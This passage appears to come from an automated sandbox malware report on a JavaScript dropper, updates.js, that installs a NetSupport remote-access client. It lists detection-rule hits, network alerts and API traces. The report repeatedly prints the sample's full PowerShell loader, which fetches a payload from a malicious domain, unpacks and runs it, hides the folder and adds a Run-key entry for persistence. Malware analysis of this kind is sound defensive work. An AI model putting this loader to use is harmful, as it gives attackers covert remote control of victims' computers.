-Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS; Engine Version = 5.1.19041.1682 Runspace ID = 3db943c9-3ccd-4813-a0d8-76fe9dd56238 Pipeline ID = 1 Command Name = Add-Type Command Type = Cmdlet Script Name = Command Path = Sequence Number = 16 User = user-PC\user Connected User = Shell ID = Microsoft.PowerShell, EventID: 4103, Payload: CommandInvocation(Add-Type): "Add-Type"ParameterBinding(Add-Type): name="AssemblyName"; value="System.IO.Compression.FileSystem", Source: Microsoft-Windows-PowerShell, UserData: , data0: Severity = Informational Host Name = ConsoleHost Host Version = 5.1.19041.1682 Host ID = 3a17fd44-b34d-41d8-a409-5a5030e19461 Host Application = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe'
                                Sigma detected: Usage Of Web Request Commands And Cmdlets
                                Source: Process startedAuthor: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim
                                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                                Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ProcessId: 7336, ProcessName: wscript.exe
                                Sigma detected: Non Interactive PowerShell Process Spawned
                                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minimum -10 -Maximum 37; $LIEDXZVHUH=[System.Environment]::GetFolderPath('ApplicationData')+'\GRDCWLLI'+$asd;if (!(Test-Path $LIEDXZVHUH -PathType Container)) { New-Item -Path $LIEDXZVHUH -ItemType Directory };$p=Join-Path $LIEDXZVHUH 'tttt.zip';[System.IO.File]::WriteAllBytes($p,$QEPGEKUSQFV);try { Add-Type -A System.IO.Compression.FileSystem;[System.IO.Compression.ZipFile]::ExtractToDirectory($p,$LIEDXZVHUH)} catch { Write-Host 'Failed: ' + $_; exit};$CV=Join-Path $LIEDXZVHUH 'client32.exe';if (Test-Path $CV -PathType Leaf) { Start-Process -FilePath $CV} else {Write-Host 'No exe.'};$fd=Get-Item $LIEDXZVHUH -Force; $fd.attributes='Hidden';$s=$LIEDXZVHUH+'\client32.exe';$k='HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run';$v='HQWQTO';$DS='String';New-ItemProperty -Path $k -Name $v -Value $s -PropertyType $DS;, CommandLine|base64offset|contains: L, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\updates.js", ParentImage: C:\Windows\System32\wscript.exe, ParentProcessId: 7336, ParentProcessName: wscript.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex Bypass -NoP -C $HGWCFVIPUNW='http://dfwreds.com/data.php?14991';$AZEWTJMSL=(New-Object System.Net.WebClient).DownloadString($HGWCFVIPUNW);$QEPGEKUSQFV=[System.Convert]::FromBase64String($AZEWTJMSL);$asd = Get-Random -Minim

                                Remote Access Functionality

                                barindex
                                Sigma detected: Powershell drops NetSupport RAT client
                                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7424, TargetFilename: C:\Users\user\AppData\Roaming\GRDCWLLI20\NSM.LIC

                                Snort Signatures

                                Timestamp:07/16/24-22:29:48.775589
                                SID:2054426
                                Source Port:58012
                                Destination Port:53
                                Protocol:UDP
                                Classtype:A Network Trojan was detected

                                Suricata Signatures

                                Timestamp:2024-07-16T22:29:37.087965+0200
                                SID:2827745
                                Source Port:49731
                                Destination Port:443
                                Protocol:TCP
                                Classtype:Malware Command and Control Activity Detected
                                Timestamp:2024-07-16T22:29:37.087965+0200
                                SID:2857473
                                Source Port:49731
                                Destination Port:443
                                Protocol:TCP
                                Classtype:Malware Command and Control Activity Detected
                                Timestamp:2024-07-16T22:29:54.986481+0200
                                SID:2034559
                                Source Port:49732
                                Destination Port:80
                                Protocol:TCP
                                Classtype:Potential Corporate Privacy Violation
                                Timestamp:2024-07-16T22:30:00.900003+0200
                                SID:2022930
                                Source Port:443
                                Destination Port:49733
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:2024-07-16T22:30:43.615970+0200
                                SID:2022930
                                Source Port:443
                                Destination Port:52098
                                Protocol:TCP
                                Classtype:A Network Trojan was detected
                                Timestamp:2024-07-16T22:29:48.775589+0200
                                SID:2054426
                                Source Port:58012
                                Destination Port:53
                                Protocol:UDP
                                Classtype:Domain Observed Used for C2 Detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: http://dfwreds.com/data.php?14991Avira URL Cloud: Label: malware
                                Multi AV Scanner detection for dropped file
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\HTCTL32.DLLReversingLabs: Detection: 13%
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeReversingLabs: Detection: 26%
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\remcmdstub.exeReversingLabs: Detection: 23%
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,3_2_110ADA40
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110ADA40 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,7_2_110ADA40
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\GRDCWLLI20\msvcr100.dllJump to behavior
                                Source: Binary string: msvcr100.i386.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BADE4000.00000004.00000800.00020000.00000000.sdmp, client32.exe
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\Full\pcichek.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmp
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,3_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1102D9F4 Sleep,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102D9F4
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1102DD21 CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,3_2_1102DD21
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_1110BD70 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,3_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 3_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,3_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1102D900 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,FindCloseChangeNotification,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,7_2_1102D900
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_111273E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,7_2_111273E0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1110BD70 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,7_2_1110BD70
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_110663B0 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,7_2_110663B0
                                Source: C:\Users\user\AppData\Roaming\GRDCWLLI20\client32.exeCode function: 7_2_1106ABD0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,7_2_1106ABD0

                                Software Vulnerabilities

                                barindex
                                Suspicious execution chain found
                                Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2054426 ET TROJAN ZPHP CnC Domain in DNS Lookup (dfwreds .com) 192.168.2.4:58012 -> 1.1.1.1:53
                                Source: global trafficHTTP traffic detected: GET /data.php?14991 HTTP/1.1Host: dfwreds.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 104.26.0.231 104.26.0.231
                                Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.103
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.103
                                Source: unknownTCP traffic detected without corresponding DNS query: 94.158.245.103
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: global trafficHTTP traffic detected: GET /data.php?14991 HTTP/1.1Host: dfwreds.comConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: dfwreds.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://94.158.245.103/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 94.158.245.103Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: client32.exeString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exeString found in binary or memory: http://%s/testpage.htm
                                Source: wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://0.30000000000000004.com/
                                Source: client32.exe, client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BBE72000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAA33000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BBD31000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://dfwreds.com
                                Source: wscript.exeString found in binary or memory: http://dfwreds.com/data.ph
                                Source: powershell.exe, 00000001.00000002.1816102376.00000170B8750000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1881774532.00000170D2B15000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://dfwreds.com/data.php?14991
                                Source: client32.exe, client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.asp
                                Source: client32.exe, 00000007.00000002.1908960911.0000000011194000.00000002.00000001.01000000.00000007.sdmpString found in binary or memory: http://geo.netsupportsoftware.com/location/loca.aspSetChannel(%s)
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BC156000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BC0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://s2.symcb.com0
                                Source: wscript.exe, 00000000.00000003.1662763001.000002211256B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1662763001.0000022111B6B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.0000022112A2F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1665260818.000002211342F000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://stat.ethz.ch/R-manual/R-devel/library/grDevices/html/boxplot.stats.html
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crl0f
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcb.com/sv.crt0
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://sv.symcd.com0&
                                Source: wscript.exe, 00000000.00000003.1664449430.0000022110546000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BBE9A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BC0D0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/cps0(
                                Source: powershell.exe, 00000001.00000002.1816720389.00000170BAFFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAECC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAF06000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEAD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAED6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1816720389.00000170BAEF8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.symauth.com/rpa00
                                Source: powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                Source: powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                Source: powershell.exe, 00000001.00000002.1839088758.00000170CA885000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
